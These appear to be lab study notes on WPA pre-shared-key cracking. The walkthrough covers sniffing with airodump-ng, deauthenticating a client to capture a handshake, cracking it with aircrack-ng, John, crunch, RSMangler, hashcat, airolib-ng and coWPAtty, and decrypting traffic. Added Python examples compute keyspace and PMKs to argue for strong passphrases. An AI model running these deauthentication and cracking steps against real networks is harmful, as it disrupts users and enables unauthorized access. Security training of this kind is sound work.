d. PSK Cracking


Crack walkthrough:

  1. Sniff nearby APs:
     sudo airodump-ng wlan0mon
  2. Restrict the dump to the target channel, ESSID and BSSID, and write a capture file:
     sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
  3. Deauthenticate the client:
     sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
  4. Crack the captured handshake:
     aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
  5. Decrypt the captured traffic with the recovered passphrase:
     airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

John cracking:

john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap

Crunch:

crunch <minlength> <maxlength> <characters> -t <pattern> -p <words>
crunch 11 11 0123456789 -t password@@@

Output:
Crunch will now generate the following number of lines: 1000
password000
password001
password002
password003

Pipe straight into aircrack-ng:
crunch 5 5 -t ddd% | aircrack-ng -e wifu crunch-01.cap -w -
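The output above makes the point that a pattern's strength is just the product of its placeholder classes: three digit positions behind a fixed word is 1000 candidates, which any laptop exhausts in seconds. The following is an added example, not part of the original notes and not crunch's own code; it counts candidates for a crunch-style -t pattern and turns the count into a worst-case time at a given PMK-derivation rate. The placeholder meanings follow the crunch -t documentation (@ lowercase, , uppercase, % digits, ^ symbols); the fallback alphabets and the default rate in strength_report are this example's assumptions, and an explicit charset argument replaces the @ class the way the page's 0123456789 does.

```python
"""Keyspace of a crunch-style -t pattern and the work it implies (added example)."""
from typing import Dict, Optional

# Fallback alphabets for each placeholder class. These are assumptions of this
# example; crunch's documentation is authoritative for its defaults.
DEFAULT_SETS: Dict[str, str] = {
    "@": "abcdefghijklmnopqrstuvwxyz",          # lowercase letters
    ",": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",          # uppercase letters
    "%": "0123456789",                          # digits
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",  # symbols (assumed set)
}


def pattern_keyspace(pattern: str, charset: Optional[str] = None) -> int:
    """Return how many candidates `pattern` expands to.

    Literal characters contribute a factor of 1; each placeholder contributes
    the size of its class. `charset`, when given, overrides the '@' class,
    mirroring `crunch 11 11 0123456789 -t password@@@`.
    """
    sets = dict(DEFAULT_SETS)
    if charset:
        sets["@"] = charset
    total = 1
    for ch in pattern:
        # Placeholders map to their class; any other character is a literal,
        # i.e. a one-character class.
        total *= len(sets.get(ch, ch))
    return total


def seconds_to_exhaust(keyspace: int, pmk_per_second: float) -> float:
    """Worst-case time to derive a PMK for every candidate at the given rate.

    Each WPA guess costs one PBKDF2-HMAC-SHA1 run of 4096 iterations, so the
    rate must be a PMK-derivation rate, not a raw SHA-1 rate.
    """
    if pmk_per_second <= 0:
        raise ValueError("rate must be positive")
    return keyspace / pmk_per_second


def strength_report(pattern: str, charset: Optional[str] = None,
                    pmk_per_second: float = 1_000.0) -> Dict[str, float]:
    """Summarise a passphrase structure for a policy discussion.

    The default rate is a placeholder, not a measurement: substitute the figure
    `hashcat -b -m 2500` or `aircrack-ng -S` reports on the hardware of interest.
    """
    n = pattern_keyspace(pattern, charset)
    return {
        "candidates": n,
        "bits": n.bit_length() - 1 if n else 0,  # floor(log2 n)
        "hours_worst_case": seconds_to_exhaust(n, pmk_per_second) / 3600,
    }


if __name__ == "__main__":
    # The page's own example: a fixed word followed by three digit positions.
    print(strength_report("password@@@", "0123456789"))
    # Eight random lowercase letters, for contrast.
    print(strength_report("@@@@@@@@"))
```

Feed strength_report the rate your own benchmark produces; the "bits" figure is what to compare against a passphrase policy, since a fixed word plus a few digits contributes almost nothing to it.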

RSMangler

rsmangler --file wordlist.txt --min 12 --max 13 --output mangled.txt

Use with aircrack:

rsmangler --file wordlist.txt --min 12 --max 13 | aircrack-ng -e wifu rsmangler-01.cap -w -

Hashcat

hashcat -I
hashcat -b -m <mode>
hashcat -d <device-nr>
hashcat -D <device-type>
/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx
hashcat -m 2500 output.hccapx /usr/share/john/password.lst

Airolib-ng

  1. Create a file containing the ESSID of the target AP:
     echo wifu > essid.txt
  2. Import the ESSID into the database:
     airolib-ng <db-name>.sqlite --import essid essid.txt
  3. List info about the DB:
     airolib-ng <db-name>.sqlite --stats
  4. Import passwords into the DB:
     airolib-ng <db-name>.sqlite --import passwd /usr/share/john/password.lst
  5. Process the DB and generate PMKs:
     airolib-ng <db-name>.sqlite --batch
  6. Initiate the crack:
     aircrack-ng -r <db-name>.sqlite wpa1-01.cap

coWPAtty:

  1. Generate the table:
     genpmk -f /usr/share/john/password.lst -d <outfile> -s <essid>
  2. Crack with coWPAtty:
     cowpatty -r wpajohn-01.cap -d <outfile> -s wifu
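Both airolib-ng (--import essid, then --batch) and genpmk (-s <essid>) need the ESSID before they can precompute anything, because the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as the salt. The following added example, which is not from the page, aircrack-ng, airolib-ng or coWPAtty, implements that IEEE 802.11i mapping in Python and builds a small in-memory PMK table in the spirit of those tools. It is checked against the standard's published test vector ("password" / "IEEE") and makes the defensive point concrete: a table built for one ESSID finds nothing against a network with a different ESSID, which is why a non-default ESSID defeats generic precomputed tables. The candidate list in the demo is constructed for illustration.

```python
"""WPA/WPA2 PMK derivation and an ESSID-bound PMK table (added example)."""
import hashlib
from typing import Dict, Iterable, Optional

PBKDF2_ITERATIONS = 4096  # fixed by IEEE 802.11i
PMK_LEN = 32              # 256-bit PMK


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 iterations, 32 bytes).

    This is the passphrase-to-PSK mapping aircrack-ng, airolib-ng and genpmk
    all implement; the 4096 iterations are the per-guess cost a cracker pays.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), essid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LEN,
    )


def build_pmk_table(essid: str, candidates: Iterable[str]) -> Dict[bytes, str]:
    """Precompute PMK -> passphrase for one ESSID, as airolib-ng --batch does.

    The table is keyed by PMK so that a lookup is a dictionary hit rather than
    a fresh PBKDF2 run per candidate; that is the whole point of precomputation.
    """
    return {derive_pmk(pw, essid): pw for pw in candidates}


def find_passphrase(table: Dict[bytes, str], pmk: bytes) -> Optional[str]:
    """Reverse lookup; None when the PMK was derived under another ESSID."""
    return table.get(pmk)


if __name__ == "__main__":
    # Constructed candidate list standing in for /usr/share/john/password.lst.
    candidates = ["password", "letmein1", "12345678"]
    table = build_pmk_table("IEEE", candidates)

    # Same passphrase, same ESSID: the table answers.
    print(find_passphrase(table, derive_pmk("password", "IEEE")))  # password
    # Same passphrase, different ESSID: the table is useless.
    print(find_passphrase(table, derive_pmk("password", "ieee")))  # None
    print(derive_pmk("password", "IEEE").hex())
```

The ESSID enters only as the salt, so changing a single character of it invalidates every precomputed entry; combined with the 4096-iteration cost per guess, that is the argument for a unique ESSID and a long random passphrase rather than the word-plus-digits structure the crunch example above targets.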